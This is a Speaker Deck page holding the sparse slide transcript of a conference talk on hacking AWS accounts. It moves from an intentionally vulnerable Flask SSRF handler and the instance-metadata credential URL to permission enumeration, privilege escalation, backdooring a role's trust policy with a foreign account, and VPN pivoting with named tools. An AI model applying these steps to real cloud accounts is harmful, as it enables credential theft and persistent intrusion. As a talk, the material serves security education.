Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Step by step AWS Cloud Hacking
Search
andresriancho
September 25, 2020
Technology
0
610
Step by step AWS Cloud Hacking
andresriancho
September 25, 2020
Tweet
Share
More Decks by andresriancho
See All by andresriancho
Step by step AWS Cloud Hacking
andresriancho
2
2.9k
Internet-Scale analysis of AWS Cognito Security
andresriancho
1
12k
Threat Modelling
andresriancho
0
1.3k
Automated Security Analysis AWS Clouds
andresriancho
1
3.2k
Injecting into URLs / Breaking URL-Encoding
andresriancho
0
240
Galería de Fallos en Unicornios
andresriancho
1
220
Esoteric Web Application Vulnerabilities
andresriancho
0
1k
String Compare Timing Attacks
andresriancho
0
570
Timing Attacks
andresriancho
1
320
Other Decks in Technology
See All in Technology
改めてAWS WAFを振り返る~業務で使うためのポイント~
masakiokuda
2
250
第4回Snowflake 金融ユーザー会 Snowflake summit recap
tamaoki
1
280
AWS認定を取る中で感じたこと
siromi
1
190
Enhancing SaaS Product Reliability and Release Velocity through Optimized Testing Approach
ropqa
1
230
成長し続けるアプリのためのテストと設計の関係、そして意思決定の記録。
sansantech
PRO
0
120
KiCadでPad on Viaの基板作ってみた
iotengineer22
0
300
What’s new in Android development tools
yanzm
0
310
赤煉瓦倉庫勉強会「Databricksを選んだ理由と、絶賛真っ只中のデータ基盤移行体験記」
ivry_presentationmaterials
2
360
CRE Camp #1 エンジニアリングを民主化するCREチームでありたい話
mntsq
1
120
Backlog ユーザー棚卸しRTA、多分これが一番早いと思います
__allllllllez__
1
150
Lakebaseを使ったAIエージェントを実装してみる
kameitomohiro
0
110
american airlines®️ USA Contact Numbers: Complete 2025 Support Guide
supportflight
1
110
Featured
See All Featured
Why Our Code Smells
bkeepers
PRO
336
57k
Music & Morning Musume
bryan
46
6.6k
Agile that works and the tools we love
rasmusluckow
329
21k
The Language of Interfaces
destraynor
158
25k
A designer walks into a library…
pauljervisheath
207
24k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
18
970
Unsuck your backbone
ammeep
671
58k
Reflections from 52 weeks, 52 projects
jeffersonlam
351
20k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
50k
Building Better People: How to give real-time feedback that sticks.
wjessup
367
19k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
53
2.9k
Transcript
Ekoparty 2020 Andrés Riancho
2
3
None
5
need credentials • • • 6
7
IAM permissions 8
9 http://169.254.169.254/ /latest/meta-data/iam/security-credentials/ /latest/meta-data/iam/security-credentials/{role-name}
10
11 from urllib.request import urlopen from flask import request @app.route('/ssrf')
def handler(): url = request.args.get('url') return urlopen(url).read()
Instance metadata and S3 compromise
13
None
two ways to enumerate permissions IAM service In most cases
this will fail brute-force 15
Get* / List* / Describe* DryRun parameter 16
17 SUPPORTED_SERVICES = [ 'ec2', 's3' ]
18
./enumerate-iam.py
20
many things the attacker doesn't know. 21 { "Statement":[ {
"Effect":"Allow", "Action":[ "s3:*", "lambda:*", "..." ], "Resource":"*" } ] }
try to elevate privileges to a principal with full access
22 { "Statement":[ { "Effect":"Allow", "Action":[ "*", ], "Resource": "*" } ] }
Lambda function will have access to the IAM role 23
Getting * on *
None
existing trust policy in the AdminRole 26
27
28 { "Effect": "Allow", "Principal": { "AWS": "arn:aws:iam::925877178748:root" }, "Action":
"sts:AssumeRole" } { "Effect": "Allow", "Principal": { "AWS": ["arn:aws:iam::925877178748:root", "arn:aws:iam::320222540496:root"] }, "Action": "sts:AssumeRole" }
Never trust the trust policy
30 ARN for the backdoored role
None
32 most resources in the AWS account VPC is completely
isolated from the Internet
None
34 VPN between the attacker's workstation and a VPC
35
vpc-vpn-pivot
None
From zero to full pwn
None
40 • enumerate-iam • pacu • vpc-vpn-pivot Follow @AndresRiancho
None